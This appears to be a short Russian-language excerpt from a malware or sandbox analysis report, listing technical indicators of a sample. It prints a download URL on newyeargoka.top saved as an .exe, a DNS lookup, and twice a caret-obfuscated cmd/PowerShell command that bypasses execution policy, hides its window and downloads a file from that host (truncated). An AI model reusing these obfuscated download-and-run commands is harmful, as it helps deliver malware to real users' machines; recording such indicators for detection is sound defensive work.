Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^ers^HE^ll.^exe ^-eXECUTi^ONpoL^ICy^ ^B^YpasS^ -nO^ProfIlE -^w^In^D^OWsty^l^E H^I^dd^en^ ^(^NeW^-^O^b^jecT Sy^s^TEm.ne^T.WE^b^cl^ient^).D^oW^N^L^OadFI^le(^'http://newyeargoka.t...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "poW^ers^HE^ll.^exe ^-eXECUTi^ONpoL^ICy^ ^B^YpasS^ -nO^ProfIlE -^w^In^D^OWsty^l^E H^I^dd^en^ ^(^NeW^-^O^b^jecT Sy^s^TEm.ne^T.WE^b^cl^ient^).D^oW^N^L^OadFI^le(^'http://newyeargoka.t...' (со скрытым окном)